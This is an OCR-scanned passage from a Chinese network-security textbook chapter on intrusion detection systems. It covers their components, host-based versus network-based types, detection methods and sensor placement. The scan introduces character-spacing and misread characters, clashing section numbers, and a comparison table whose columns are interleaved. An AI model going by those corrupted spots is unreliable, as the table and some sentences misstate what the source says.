在 网 络 安全 系统 中 ,防火 墙 所 起 的 作用 类 似 于 门卫 ,是 第 一 道 防 线 , 将 内 部 网 和 
Internet 隔离 ,在 两 个 网 络 通信 时 执行 访问 控制 策略 。 但 防火 墙 无 法 阻挡 发 生 在 网 络 内 部 
的 攻击 ,入 侵 检 测 系统 如 同一 座 大 厦 的 视频 监控 系统 可 以 监视 什么 人 进 了 大 厦 , 进 入 大 厦 后 
到 了 什么 地 方 、 做 了 什么 事 ,入 侵 检测 系统 可 以 发 现 网 络 内 部 的 异常 攻击 、 登 录 主 机 后 的 异 
常 操作 等 。 本 章 重点 介绍 人 侵 检测 的 基本 原理 、 分 类 方法 、 实 现 过 程 、 检 测 模型 ,性 能 指标 ， 
以 及 人 侵 防御 系统 和 统一 威胁 管理 。 


6.1 入 侵 检测 系统 概述 


9.1.1 入 侵 检测 系统 的 概念 


随 着 Internet 的 迅猛 发 展 ,网 络 安全 越 来 越 受 到 政府 \ 企 业 乃 至 个 人 的 重视 。 过 去 , 防 
范 网 络 攻 击 最 常见 的 方法 是 防火 墙 。 然 而 ,仅仅 依赖 防火 墙 并 不 能 保证 足够 的 安全 ,如 果 把 
防火 墙 比 做 网 络 门 卫 , 那么 还 需要 可 以 主动 寻找 罪犯 的 巡警 一 一 入 侵 检测 系统 (intrusion 
detection system. IDS) , 

人 入侵 检测 技术 是 主动 保护 自己 免 受 攻击 的 一 种 网 络 安全 技术 。 作 为 防火 墙 的 合理 补 
充 , 和 人 侵 检测 技术 能 够 帮助 系统 对 付 网 络 攻击 ,扩展 了 系统 管理 员 的 安全 管理 能 力 (包括 安 
全 审计 ,监视 ,攻击 识别 和 响应 ) ,提高 了 信息 安全 基础 结构 的 完整 性 。 

IDS 的 定义 是 : 通过 从 计算 机 网 络 或 计算 机 系统 中 的 若干 关键 点 收集 信息 并 对 其 进行 
分 析 , 以 发 现 网 络 或 系统 中 是 否 有 违反 安全 策略 的 行为 和 遭 到 袭击 的 迹象 。 

IDS 被 认为 是 防火 墙 之 后 的 第 二 道 安全 闸门 ,在 不 影响 网 络 性 能 的 情况 下 ,能 对 网 络 进 
行 监测 ,从 而 提供 对 内 部 攻击 、 外 部 攻击 和 误 操作 的 实时 保护 。 

IDS 的 主要 功能 : 监控 、 分 析 用 户 和 系统 的 活动 ; 系统 构造 及 其 安全 漏洞 的 审计 ; 识别 
和信 侵 的 活动 模式 并 向 网 络 管理 员 报警 ， 对 异常 活动 的 统计 分 析 ; 操作 系统 的 审计 跟踪 管 
理 , 识 剔 违反 安全 策略 的 用 户 行为 ; 评估 关键 或 重要 系统 及 其 数据 文件 的 完整 性 。 

防火 墙 IDS 和 安全 审计 作为 网 络 安全 系统 的 重要 组 成 部 分 ,三 者 之 间 相互 独立 相互 
补充 ,三 者 关系 如 图 9-1 所 示 。 

IDS 不 仅 能 使 网 络 管理 员 了 解 网 络 系统 的 任何 变更 ,还 能 给 网 络 安全 策略 的 制定 提供 
指南 。IDS 的 配置 和 管理 应 该 简单 .方便 ,使 非 专业 人 员 容易 操作 ,并且 能 按 需 求 进行 相应 


网 络 安全 体系 


安全 
审计 


图 9-1 防火 墙 .IDS 和 安全 审计 


的 改变 。IDS 一 旦 发 现 有 入 侵 者 留 下 的 踪迹 ,应 能 及 时 做 出 响应 ,切断 网 络 连接 .记录 事件 
并 进行 报警 。 


9.1.2 入 侵 检测 系统 的 组 成 


IETF(Internet 工程 任务 组 ) 将 一 个 IDS 分 为 四 个 组 件 : 事件 产生 器 (event generators) , 事 
件 分 析 器 (event analyzers) .响应 单元 (response units) .事件 数据 库 (event databases) ,简称 
为 公共 入侵 检测 框架 (CIDF) ,其 结构 如 图 9-2 所 示 。 


事件 响应 单元 
事件 分 析 器 事件 数据 库 


事件 产生 器 


图 9-2 CIDF 的 模型 


事件 产生 器 的 功能 是 从 整个 计算 环境 中 捕获 事件 信息 ,并 向 系统 的 其 他 组 成 部 分 提供 
该 事件 数据 ; 事件 分 析 器 分 析 得 到 的 事件 数据 ,并 产生 分 析 结 果 ; 响应 单元 则 是 对 分 析 结 
果 作 出 反应 的 功能 单元 , 它 可 以 作出 切断 连接 ,改变 文件 属性 等 有 效 反 应 ,当然 也 可 以 只 是 
报警 ; 事件 数据 库 是 存放 各 种 中 间 和 最 终 数据 的 地 方 的 统称 ,用 于 指导 事件 的 分 析 及 反应 ， 
它 可 以 是 复杂 的 数据 库 , 也 可 以 是 简单 的 文本 文件 。 

图 9-3 所 示 为 一 个 典型 NIDS。 一 个 传感器 被 安装 在 防火 墙 外 以 探查 来 自 Internet 的 攻 
击 。 另 一 个 传感器 安装 在 网 络 内 部 以 探查 那些 已 穿 透 防火 墙 的 入侵 和 内 部 网 络 人 侵 和 威胁 。 
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图 9-3 一 个 典型 NIDS 
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6.2 入 侵 检测 系统 的 分 类 


IDS 通过 对 入 侵 行 为 的 过 程 与 特征 进行 研究 ,使 安全 系统 对 人 侵 事 件 和 入 侵 过程 作 出 
实时 响应 。 从 不 同 角度 出 发 ,IDS 的 分 类 也 不 同 。 


9.2.1 按 实现 技术 划分 


如 果 将 所 有 与 正常 行为 的 轨迹 不 同 的 系统 行为 都 视 为 可 疑 的 入 侵 企图 (例如 ,通过 流量 
统计 分 析 发 现 异常 的 网 络 流量 ) ,这 时 的 发 现 技术 称 为 异常 发 现 技术 ; 如 果 所 有 的 入 侵 手 段 
及 其 行为 轨迹 都 可 以 用 模式 或 特征 加 以 描述 时 ,与 正常 行为 模式 不 相 匹配 的 行为 均 视 为 可 
疑 的 入侵 行为 ,这 样 的 发 现 技术 称 为 模式 发 现 技术 。 

异常 发 现 技术 的 局 限 是 并 非 所 有 的 入 侵 都 表现 为 异常 ,而 且 系 统 的 轨迹 也 难于 计算 和 
更 新 。 模 式 发 现 技术 的 优点 是 误 报 少 , 它 的 局 限 是 只 能 发 现 已 知 的 入 侵 , 对 未 知 的 入 侵 无 能 
为 力 。 


9.2.2 按 数据 来 源 划分 


如 果 按 照 IDS 的 数据 来 源 范围 来 划分 ,IDS 分 为 3 类 : 基于 主机 的 IDS(host IDS, 
HIDS) .基于 网 络 的 IDSCnetwork IDS,NIDS) 和 分 布 式 IDS(distributed IDS, DIDS) , 


1. 基于 主机 的 入 侵 检测 系统 


HIDS 通常 是 安装 在 被 重点 检测 的 主机 之 上 ,主要 是 对 该 主机 的 网 络 实时 连接 以 及 系 
统 审 计 日 志 进 行 智能 分 析 和 判断 。 如 果 其 中 主体 活动 十 分 可 疑 ,IDS 就 会 采取 相应 措施 。 

HIDS 使 用 验证 记录 ,并 发 展 了 精密 的 可 迅速 做 出 响应 的 检测 技术 。 通 常 ,HIDS 可 监 
探 系 统 .事件 和 Windows NT 下 的 安全 记录 以 及 UNIX 环境 下 的 系统 记录 。 当 有 文件 发 生 
变化 ,IDS 将 新 的 记录 条 目 与 攻击 标记 相 比较 ,看 是 否 匹配 。 如 果 匹 配 , 系 统 就 会 向 管理 员 
报警 并 向 别 的 目标 报告 ,以 采取 措施 。 

HIDS 在 发 展 过 程 中 融入 了 其 他 技术 。 对 关键 系统 文件 和 可 执行 文件 的 入 侵 检测 的 一 
个 常用 方法 ,是 通过 定期 检查 校 验 和 来 进行 的 ,以 便 发 现 意外 的 变化 。 反 应 的 快慢 与 轮 询 间 
隔 的 频率 有 直接 关系 。 最 后 ,许多 系统 都 是 监听 端口 的 活动 ,并 在 特定 端口 被 访问 时 向 管理 
员 报 警 。 这 类 检测 方法 将 基于 网 络 的 入侵 检测 的 基本 方法 融入 到 基于 主机 的 检测 环境 中 。 

尽管 HIDS 不 如 NIDS 快捷 ,但 它 确实 具有 基于 网 络 的 系统 无 法 比拟 的 优点 。 这 些 优 
点 包括 更 好 的 辨识 分 析 、 对 特殊 主机 事件 的 紧密 关注 及 低廉 的 成 本 。 

HIDS 的 优点 如 下 。 

(1) 确定 攻击 是 否 成 功 。 由 于 基于 HIDS 使 用 含有 已 发 生 事件 信息 ,它们 可 以 比 NIDS 
更 加 准确 地 判断 攻击 是 否 成 功 。 在 这 方面 ,HIDS 是 NIDS 的 完美 补充 ,网 络 部 分 可 以 尽早 
提供 警告 ,主机 部 分 可 以 确定 攻击 成 功 与 否 。 

(2) 监视 特定 的 系统 活动 。HIDS 监视 用 户 和 访问 文件 的 活动 ,包括 文件 访问 、 改 变 文 
件 权限 ,试图 建立 新 的 可 执行 文件 或 者 试图 访问 特殊 的 设备 。 
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例如 , HIDS 可 以 监督 所 有 用 户 的 登录 及 上 网 情况 ,以 及 每 位 用 户 在 联结 到 网 络 以 后 的 
行为 ,对 于 NIDS 要 做 到 这 个 程度 是 非常 困难 的 ; HIDS 可 监视 只 有 管理 员 才 能 实施 的 非 正 
常 行为 ,操作 系统 记录 了 任何 有 关 用 户 账号 的 增加 、 删 除 、 更 改 的 情况 ,改动 一 旦 发 生 , HIDS 
就 能 检测 到 这 种 不 适当 的 改动 ; HIDS 可 以 监视 主要 系统 文件 和 可 执行 文件 的 改变 ,系统 能 
够 查 出 那些 欲 改写 重要 系统 文件 或 者 安装 特洛伊 木马 或 后 门 的 尝试 并 将 它们 中 断 , 而 
NIDS 有 时 会 查 不 到 这 些 行为 。 

(3) 能 够 检查 到 NIDS 检查 不 出 的 攻击 。 例 如 ,来 自主 要 服务 器 键盘 的 攻击 不 经 过 网 
络 , 所 以 可 以 躲 开 NIDS. 

(4) 适用 被 加 密 的 和 交换 的 环境 。 交 换 设备 将 大 型 网 络 分 成 许多 小 型 网 络 加 以 管理 ， 
从 覆盖 足够 大 的 网 络 范围 的 角度 出 发 ,很 难 确定 配置 NIDS 的 最 佳 位 置 ,业务 映射 和 交换 机 
上 的 管理 端口 有 助 于 此 ,但 这 些 技术 并 不 适用 。HIDS 可 安装 在 所 需 的 重要 主机 上 ,在 交换 
的 环境 中 具有 更 高 的 能 见 度 。 某 些 加 密 方式 也 向 NIDS 发 出 了 挑战 。 由 于 加 密 方式 位 于 协 
议 堆栈 内 ,所 以 NIDS 可 能 对 某 些 攻击 没有 反应 ,HIDS 没有 这 方面 的 限制 , 当 操 作 系 统 及 
HIDS 看 到 即将 到 来 的 业务 时 ,数据 流 已 经 被 解密 了 。 

(5) 近 于 实时 的 检测 和 响应 。 尽 管 HIDS 不 能 提供 真正 实时 的 反应 ,但 如 果 应 用 正确 ， 
反应 速度 可 以 非常 接近 实时 。 老 式 系统 利用 一 个 进程 在 预先 定义 的 间隔 内 检查 登记 文件 的 
状态 和 内 容 ,与 老式 系统 不 同 ,当前 HIDS 的 中 断 指令 ,这 种 新 的 记录 可 被 立即 处 理 ,显著 减 
少 了 从 攻击 验证 到 作出 响应 的 时 间 , 从 操作 系统 作出 记录 到 HIDS 得 到 辨识 结果 之 间 的 这 
段 时 间 是 一 段 延迟 ,但 大 多 数 情况 下 ,在 破坏 发 生 之 前 ,系统 就 能 发 现 和 人 侵 者 ,并 中 止 他 的 
攻击 。 

(6) 不 要 求 额外 的 硬件 设备 。HIDS 存在 于 现行 网 络 结构 之 中 ,包括 文件 服务 器 、Web 
服务 器 及 其 他 共享 资源 ,这 使 得 HIDS 效率 很 高 。 因 为 它们 不 需要 在 网 络 上 另外 安装 硬件 
设备 。 

C) 记录 花费 更 加 低廉 。NIDS 比 HIDS 要 昂贵 得 多 。 

HIDS 有 如 下 的 弱点 。 

(1) 主机 IDS 安装 在 我 们 需要 保护 的 设备 上 ,如 当 一 个 数据 库 服务 器 要 保护 时 ,就 要 在 
服务 器 本 身 安 装 IDS。 这 会 降低 应 用 系统 的 效率 。 此 外 , 它 也 会 带 来 一 些 额外 的 安全 问题 ， 
安装 了 HIDS 后 ,将 本 不 允许 安全 管理 员 有 权力 访问 的 服务 器 变 成 他 可 以 访问 的 了 。 

(2) HIDS 依赖 于 服务 器 固有 的 日 志 与 监视 能 力 。 如 果 服 务 器 没有 配置 日 志 功 能 , 则 必 
须 重新 配置 ,这 将 会 给 运行 中 的 业务 系统 带 来 不 可 预见 的 性 能 影响 。 

(3) 全 面部 署 HIDS 代价 较 大 ,企业 很 难 将 所 有 主机 用 HIDS 保护 ,只 能 选择 部 分 主机 
保护 。 那 些 未 安装 HIDS 的 机 器 将 成 为 保护 的 盲点 ,入侵 者 可 利用 这 些 机 器 达到 攻击 目标 。 

(4) HIDS 除了 监测 自身 的 主机 以 外 ,根本 不 监测 网 络 上 的 情况 。 对 入 侵 行 为 的 分 析 的 
工作 量 将 随 着 主机 数目 增加 而 增加 。 


2. 基于 网 络 的 入 侵 检测 系统 


NIDS ,通过 对 网 络 中 传输 的 数据 包 进 行 分 析 , 从 而 发 现 可 能 的 恶意 攻击 企图 。 一 个 典 
型 的 例子 是 在 不 同 的 端口 检查 大 量 的 TCP 连接 请 求 ,以 此 发 现 TCP 端口 扫描 的 攻击 企图 。 
NIDS 既 可 以 运行 在 仅仅 监视 自己 的 端口 的 主机 上 ,也 可 以 运行 在 监视 整个 网 络 状态 的 处 
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于 混杂 模式 的 sniffer 主机 上 。 
目前 ,大 部 分 人 侵 检测 的 产品 是 基于 网 络 的 ,有 多 个 开放 源 代 码 软 件 , 如 snort, NFR, 
shadow 等 ,其 中 snort 最 著名 ,其 研发 进展 和 更 新 速度 均 超过 大 部 分 同类 产品 。 

由 于 NIDS 不 像 路 由 器 .防火墙 等 关键 设备 , 它 不 会 成 为 系统 中 的 关键 路 径 。NIDS 发 
生 故 障 不 会 影响 正常 业务 的 运行 。NIDS 只 检查 它 直接 连接 的 网 段 通信 状态 ,不 检测 其 他 
网 段 的 数据 包 。 在 交换 式 以 太 网 中 会 出 现 监视 范围 的 局 限 。NIDS 通常 采用 特征 检测 手 
段 , 对 一 些 复杂 的 计算 与 分 析 的 攻击 较 难 检测 到 。 

NIDS 使 用 原始 网 络 包 作为 数据 源 。NIDS 通常 利用 一 个 运行 在 随机 模式 下 的 网 络 适 
配器 来 实时 监视 并 分 析 通过 网 络 的 所 有 通信 业务 。 它 的 攻击 辨识 模块 通常 使 用 四 种 常用 技 
术 来 识别 攻击 标志 : 模式 、 表 达 式 或 字 节 匹配 ; 频率 或 穿越 冰 值 ;低级 事件 的 相关 性 ; 统计 
学 意义 上 的 非常 规 现象 检测 。 

一 旦 检测 到 了 攻击 行为 ,IDS 的 响应 模块 就 提供 多 种 选项 以 通知 .报警 并 对 攻击 采取 相 
应 的 反应 。 反 应 因 系 统 而 异 ,通常 都 包括 通知 管理 员 ,中断 连 接 或 为 法 庭 分 析 和 证 据 收集 而 
做 会 话 记 录 。 

NIDS 已 经 成 为 安全 策略 实施 的 重要 组 件 , 它 有 许多 仅 靠 HIDS 无 法 提供 的 优点 。 

CD 拥有 成 本 较 低 。NIDS 可 在 几 个 关键 访问 点 上 进行 策略 配置 ,以 观察 发 往 多 个 系统 
的 网 络 通信 。 所 以 它 不 要 求 在 许多 主机 上 装载 并 管理 软件 。 由 于 需 监测 的 点 较 少 ,因此 对 
于 一 个 公司 的 环境 来 说 ,拥有 成 本 很 低 。 

(2) 检测 HIDS 漏 掉 的 攻击 。NIDS 检查 所 有 包 的 头 部 从 而 发 现 恶意 的 和 可 疑 的 行动 
迹象 。HIDS 无 法 查看 包 的 头 部 ,所 以 它 无 法 检测 到 这 一 类 型 的 攻击 。 例 如 ,许多 来 自卫 地 
址 的 拒绝 服务 型 和 碎片 型 攻击 在 经 过 网 络 时 ,可 以 在 NIDS 中 通过 实时 监测 包 流 而 被 发 现 。 

NIDS 可 以 检查 有 效 负载 的 内 容 ,查找 用 于 特定 攻击 的 指令 或 语法 。 例 如 ,通过 检查 数 
据 包 有 效 负 载 可 以 查 到 黑客 软件 ,而 使 正在 寻找 系统 漏洞 的 攻击 者 毫 无 察觉 。 由 于 HIDS 
不 检查 有 效 负载 ,所 以 不 能 辨认 有 效 负载 中 所 包含 的 攻击 信息 。 

(3) 攻击 者 不 易 转移 证 据 。NIDS 使 用 正在 发 生 的 网 络 通信 进行 实时 攻击 的 检测 ,所 以 
攻击 者 无 法 转移 证 据 。 被 捕获 的 数据 不 仅 包括 攻击 的 方法 ,还 包括 可 识别 的 入 侵 者 身份 及 
对 其 进行 起 诉 的 信息 。 许 多 入 侵 者 都 熟知 审计 记录 ,他 们 知道 如 何 操纵 这 些 文件 掩盖 他 们 
的 人 侵 痕 迹 ,来 阻止 需要 这 些 信息 的 HIDS 去 检测 入 侵 。 

(4) 实时 检测 和 响应 。NIDS 可 以 在 恶意 及 可 疑 的 攻击 发 生 的 同时 将 其 检测 出 来 ,并 做 
出 更 快 的 通知 和 响应 。 例 如 ,一 个 基于 TCP 的 对 网 络 进行 的 拒绝 服务 攻击 可 以 通过 将 
NIDS 发 出 TCP 复位 信号 ,在 该 攻击 对 目标 主机 造成 破坏 前 ,将 其 中 断 。 而 HIDS 只 有 在 可 
疑 的 登录 信息 被 记录 下 来 以 后 才能 识别 攻击 并 做 出 反应 。 而 这 时 关键 系统 可 能 早 就 遭 到 了 
破坏 ,或 是 运行 HIDS 的 系统 已 被 摧毁 。 

(5) 检测 未 成 功 的 攻击 和 不 良 意 图 。NIDS 增加 了 许多 有 价值 的 数据 ,以 判别 不 良 意 
图 。 即 便 防火 墙 可 以 正在 拒绝 这 些 尝试 ,位 于 防火 墙 之 外 的 NIDS 可 以 查 出 躲 在 防火 墙 后 
的 攻击 意图 。HIDS 无 法 查 到 从 未 攻击 到 防火 墙 内 主机 的 未 遂 攻 击 ,而 这 些 丢失 的 信息 对 
于 评估 和 优化 安全 策略 是 至 关 重要 的 。 

(6) 操作 系统 无 关 性 。NIDS 作为 安全 监测 资源 ,与 主机 的 操作 系统 无 关 。 与 之 相 比 ， 
HIDS 必须 在 特定 的 .没有 遭 到 破坏 的 操作 系统 中 才能 正常 工作 。 
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NIDS 有 向 专门 的 设备 发 展 的 趋势 ,安装 这 样 的 一 个 NIDS 非常 方便 ,只 需 将 定制 的 设 
备 接 上 电源 ,做 很 少 一 些 配置 ,将 其 连 到 网 络 上 即 可 。 

NIDS 有 如 下 的 弱点 。 

(1) NIDS 只 检查 它 直 接连 接 网 段 的 通信 ,不 能 检测 在 不 同 网 段 的 网 络 包 。 在 使 用 交换 
以 太 网 的 环境 中 就 会 出 现 监测 范围 的 局 限 。 而 安装 多 台 NIDS 的 传感器 会 使 部 署 整个 系统 
的 成 本 大 大 增加 。 

(2) NIDS 为 了 性 能 目标 通常 采用 特征 检测 的 方法 , 它 可 以 检测 出 一 些 普通 的 攻击 ,而 
很 难 实现 一 些 复杂 的 需要 大 量 计算 与 分 析 时 间 的 攻击 检测 。 

(3) NIDS 可 能 会 将 大 量 的 数据 传 回 分 析 系统 中 。 在 一 些 系统 中 监听 特定 的 数据 包 会 
产生 大 量 的 分 析 数据 流量 。 一 些 系统 在 实现 时 采用 一 定 方法 来 减少 回 传 的 数据 量 , 对 入 侵 
判断 的 决策 由 传感器 实现 ,而 中 央 控 制 台 成 为 状态 显示 与 通信 中 心 ,不 再 作为 人 侵 行为 分 析 
器 。 这 样 的 系统 中 的 传感器 协同 工作 能 力 较 弱 。 

(4). NIDS 处 理 加 密 的 会 话 过 程 较 困难 ,目前 通过 加 密 通 道 的 攻击 尚 不 多 ,但 随 着 IPv6 
的 普及 ,这 个 问题 会 越 来 越 突出 。 


3. 分 布 式 入 侵 检测 系统 


目前 这 种 技术 在 ISS 的 RealSecure 等 产品 中 已 经 有 了 应 用 。 它 检测 的 数据 也 是 来 源 
于 网 络 中 的 数据 包 , 不 同 的 是 , 它 采 用 分 布 式 检测 、 集 中 管理 的 方法 。 即 在 每 个 网 段 安装 一 
个 黑匣子 ,该 黑匣子 相当 于 NIDS, 只 是 没有 用 户 操作 界面 。 黑 匣子 用 来 监测 其 所 在 网 段 上 
的 数据 流 , 它 根据 集中 安全 管理 中 心 制定 的 安全 策略 、 响 应 规则 等 来 分 析 检 测 网 络 数据 , 同 
时 向 集中 安全 管理 中 心 发 回 安全 事件 信息 。 集 中 安全 管理 中 心 是 整个 DIDS 面向 用 户 的 界 
面 。 它 的 特点 是 对 数据 保护 的 范围 比较 大 ,但 对 网 络 流量 有 一 定 的 影响 。 


4. 基于 主机 和 基于 网 络 的 入 侵 检测 比较 


HIDS 和 NIDS 都 有 其 优势 和 劣势 ,两 种 方法 互 为 补充 。 一 种 真正 有 效 的 IDS 应 将 二 
者 结合 。HIDS 和 NIDS 的 比较 见 表 9-1. 


表 9-1 HIDS 和 NIDS 的 比较 


基于 主机 
可 以 检测 到 基于 网 络 所 忽略 的 攻击 :来 自 关键 服务 
器 键盘 的 攻击 (内 部 ,不 经 过 网 络 ) 等 攻击 者 


基于 网 络 
可 以 检测 到 基于 主机 所 忽略 的 攻击 : DoS, BackOffice 


攻击 者 更 难 抹 去 攻击 的 证 据 可 以 事后 比较 成 功 和 失败 的 攻击 
实时 检测 并 响应 接近 实时 检测 和 响应 

检测 不 成 功 的 攻击 和 恶意 企图 监测 系统 特定 的 行为 

独立 于 操作 系统 很 好 地 适应 加 密 和 交换 网 络 环境 
可 以 监测 活动 的 会 话 情况 不 能 

给 出 网 络 原始 数据 的 日 志 不 能 

终止 TCP 连接 终止 用 户 的 登录 

重新 设置 防火 墙 封杀 用 户 账号 


探 针 可 以 分 布 在 整个 网 络 并 向 管理 站 报告 只 能 保护 配置 引擎 或 代理 的 主机 
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9.2.8 按 工作 方式 划分 


根据 工作 方式 分 为 离线 检测 系统 与 在 线 检测 系统 。 

(1) 离线 检测 系统 是 非 实时 工作 的 系统 , 它 在 事后 分 析 审计 事件 ,从 中 检查 人 侵 活 动 。 
事后 人 侵 检 测 由 网 络 管理 人 员 进 行 ,他 们 具有 网 络 安 全 的 专业 知识 ,根据 计算 机 系统 对 用 户 
操作 所 做 的 历史 审计 记录 判断 是 否 存在 入 侵 行为 ,如 果 有 就 断 开 连接 ,并 记录 入 侵 证 据 和 进 
行 数据 恢复 。 事后 入侵 检测 是 管理 员 定 期 或 不 定期 进行 的 ,不 具有 实时 性 。 

(2) 在 线 检测 系统 是 实时 联机 的 检测 系统 , 它 包含 对 实时 网 络 数据 包 分 析 、 实 时 主机 审 
计 分 析 。 其 工作 过 程 是 实时 人 侵 检测 在 网 络 连接 过 程 中 进行 ,系统 根据 用 户 的 历史 行为 模 
型 .存储 在 计算 机 中 的 专家 知识 以 及 神经 网 络 模型 对 用 户 当 前 的 操作 进行 判断 ,一 旦 发 现 入 
侵 迹 象 立 即 断 开 入 侵 者 与 主机 的 连接 ,并 收集 证 据 和 实施 数据 恢复 。 这 个 检测 过 程 是 不 断 
循环 进行 的 。 


6.3 入 侵 检测 系统 的 工作 原理 


入 侵 检测 无 论 是 基于 何 种 类 型 一 一 主机 、 网 络 、 应 用 程序 和 目标 ,或 者 是 几 种 类 型 的 集 
成 系统 ,要 实现 检测 的 目的 ,收集 信息 都 是 首要 的 任务 ; 只 有 收集 到 大 量 有 用 的 信息 ,才能 
进行 有 效 的 数据 分 析 ; 只 有 进行 有 效 的 模式 匹配 ,统计 分 析 和 完整 性 分 析 , 才 能 获得 正确 的 
结论 ,采取 积极 主动 的 安全 防护 技术 。 


9.3.1 信息 收集 


信息 收集 的 内 容 , 包 括 系 统 、 网 络 ,数据 及 用 户 活 动 的 状态 及 其 行为 。 信 息 收集 的 范围 
要 在 不 同 网 段 , 不 同 主机 ,不 同 关键 点 。 只 有 来 源 广泛 的 信息 ,才能 从 不 一 致 的 信息 中 找 出 
入 侵 者 的 踪迹 。 

入 侵 检测 利用 的 信息 一 般 来 源 于 4 个 方面 。 

(1) 系统 和 网 络 日 志文 件 是 检测 的 必要 条 件 。 通 过 查看 日 志文 件 能 够 发 现成 功 的 人 侵 
或 攻击 企图 ,并 启动 相应 的 应 急 响 应 程序 。 日 志文 件 记录 各 种 行为 类 型 ,如 用 户 活动 。 它 包 
含 登录 .用户 ID .文件 访问 、 授 权 和 认证 信息 等 。 很 明显 的 用 户 的 异常 登录 及 访问 企图 ,都 
是 必须 收集 的 信息 。 

(2) 系统 目录 和 文件 的 异常 改变 。 目 录 和 文件 中 的 异常 改变 ,特别 是 那些 限制 访问 的 
信息 ,如 发 现 被 修改 ,将 换 或 破坏 的 情况 ,很 可 能 是 黑客 入 侵 的 信号 。 

(3) 程序 执行 中 的 异常 行为 。 网 络 系统 上 的 程序 执行 一 般 包 括 操作 系统 、 网 络 服务 、 用 
户 启动 的 程序 和 特定 目的 的 应 用 ,例如 ,数据 库 服 务 器 。 每 个 程序 执行 由 一 个 或 多 个 进程 来 
实现 ,不 同 权限 的 环境 控制 着 过 程 可 访问 的 系统 资源 ,程序 和 数据 文件 等 。 一 个 进程 的 执行 
操作 方式 不 同 , 它 利用 的 系统 资源 也 不 同 。 它 所 执行 的 操作 包括 计算 、 文 件 传输 .设备 和 其 
他 进程 ,及 其 进程 间 的 通信 。 

一 个 进程 出 现 异 常 ,表明 黑客 有 可 能 人 侵 系统 ,正在 将 程序 或 服务 的 运行 分 解 ,从 而 导 
致 其 失败 ,或 者 进行 某 种 方式 的 非法 操作 。 
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(4) 物理 形式 的 入 侵 信息 。 对 网 络 硬 件 的 未 授权 连接 和 对 物理 资源 的 未 授权 访问 ,就 
是 物理 形式 的 人 侵 行为 。 黑 客 常 利 用 网 络 用 户 自 加 的 不 安全 的 设备 作为 访问 内 部 网 络 的 后 
门 , 从 而 突破 原 有 的 安全 防护 措施 进攻 其 他 系统 、 窃 取 私有 敏感 信息 。 


9.3.2 数据 分 析 


上 述 收集 到 的 各 种 信息 ,一 定 要 进行 3 种 技术 手段 的 分 析 。 其 中 模式 匹配 、 统 计 分 析 为 
实时 的 入侵 检 测 ,完整 性 分 析 则 是 事后 分 析 。 

(1) 模式 匹配 。 模 式 匹 配 是 将 收集 到 的 信息 与 已 知 网 络 人 侵 和 系统 误 用 模式 数据 库 进 
行 比 较 , 从 而 发 现 违 背 安全 策略 的 行为 。 该 过 程 或 者 简单 ,或 者 复杂 ,其 方法 的 优点 是 只 需 
收集 相关 的 数据 集合 ,从 而 显著 地 减轻 系统 负担 ,上 且 技术 相当 成 熟 。 检 测 准确 率 和 效率 相当 
高 。 但 是 很 难 对 付 不 断 升级 或 更 新 的 攻击 手段 。 

(2) 统计 分 析 。 统 计 分 析 方法 首先 给 系统 对 象 (如 用 户 .文件 .目录 和 设备 等 ) 创 建 一 个 
统计 描述 ,统计 正常 使 用 时 的 一 些 测量 属性 (如 访问 次 数 、 操 作 失败 次 数 和 延 时 等 )。 测 量 属 
性 的 平均 值 将 被 用 来 与 网 络 ,系统 的 行为 进行 比较 , 当 任何 观察 值 在 正常 值 范围 之 外 时 ,就 
认为 有 人 侵 发 生 。 

统计 分 析 的 优点 是 可 检测 到 未 知 的 入 侵 或 更 为 复杂 的 入侵 ,缺点 是 误 报 、 漏 报 率 高 , 且 
不 适应 用 户 正常 行为 的 突然 改变 。 

目前 有 基于 专家 系统 的 、 基 于 模型 推理 的 和 基于 神经 网 络 的 统计 分 析 方法 。 

(3) 完整 性 分 析 。 完 整 性 分 析 是 主要 分 析 某 个 文件 或 对 象 是 否 被 更 改 , 它 包 括 文件 和 
目录 的 内 容 及 属性 , 它 在 发 现 被 更 改 的 ,被 特洛伊 化 的 应 用 程序 方面 特别 有 效 。 因 为 完整 性 
分 析 利 用 单 向 散 列 函 数 MD5 ,可 以 识别 任何 微小 的 变化 。 这 种 方法 可 以 发 现 人 侵 导 致 的 文 
件 或 对 象 的 变化 。 但 该 方法 不 适用 于 实时 响应 , 它 可 在 每 一 天 的 特定 时 间 内 进行 全 面 的 扫 
描 检查 ,以 便 对 内 部 攻击 、 外 部 攻击 和 误 操作 造成 的 危害 采取 保护 措施 。 


6.4 入 侵 检测 系统 的 应 用 问题 


目前 ,IDS 已 成 为 安全 体系 结构 中 不 可 缺少 的 一 个 环节 。 但 是 ,IDS 在 理论 上 和 实际 应 
用 中 仍然 存在 着 许多 尚 待 解决 的 问题 。 例 如 , 现 有 的 IDS 在 10Mbps 网 上 检查 所 有 数据 包 
中 的 几 十 种 攻击 特征 时 可 以 很 好 地 工作 ,而 在 10Mbps, 100Mbps 甚至 千 兆 网 络 上 ,数据 包 
分 析 技 术 就 力不从心 了 。 另 外 ,网 络 的 发 展 速度 、 交 换 机 的 大 规模 使 用 、 针 对 TDS 的 攻击 
等 ,也 不 断 地 向 IDS 提出 新 的 问题 。 


9.4.1 检测 器 的 安装 位 置 


一 般 的 IDS 分 为 分 析 系统 、 存 储 系统 和 控制 台 等 几 个 部 分 ,对 于 一 个 小 型 网 络 ,上 述 几 
部 分 可 安装 在 同一 台 计 算 机 上 。 既 节省 使 用 成 本 ,也 提高 反应 速度 。 在 大 型 网 络 中 ,分 析 系 
统 工作 负载 大 ,存储 系统 工作 量 也 大 ,所 以 应 该 分 散在 不 同 的 计算 机 上 。 

对 于 HIDS, 其 数据 采集 部 分 应 该 位 于 其 所 监测 的 主机 上 。NIDS 需要 有 检测 器 才能 工 
作 。 如 果 检 测 器 安装 位 置 不 正确 ,NIDS 工作 状态 就 会 受 影响 。 一 般 情况 下 ,检测 器 安装 位 
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置 有 如 下 几 种 选择 。 
1. 安装 在 防火 墙 之 外 


检测 器 通常 安装 在 防火 墙 以 外 的 DMZ. DMZ 是 介 于 因特网 服务 供应 商 ISP 和 最 外 端 
防火 墙 界面 之 间 的 区 域 。 这 种 安排 使 检测 器 可 以 看 见 所 有 来 自 因特网 的 攻击 。 

但 是 ,如 果 攻 击 类 型 是 TCP 攻击 ,而 防火 墙 或 过 滤 路 由 器 能 封锁 该 攻击 ,那么 IDS 可 能 
就 检测 不 到 。 因 为 TCP 攻击 要 求 进行 几 次 握手 才 完 成 传送 任务 ,而 入侵 检测 对 许多 攻击 类 
型 只 能 通过 检测 与 字符 串 特征 是 否 一 致 的 方法 才能 被 发 现 。 

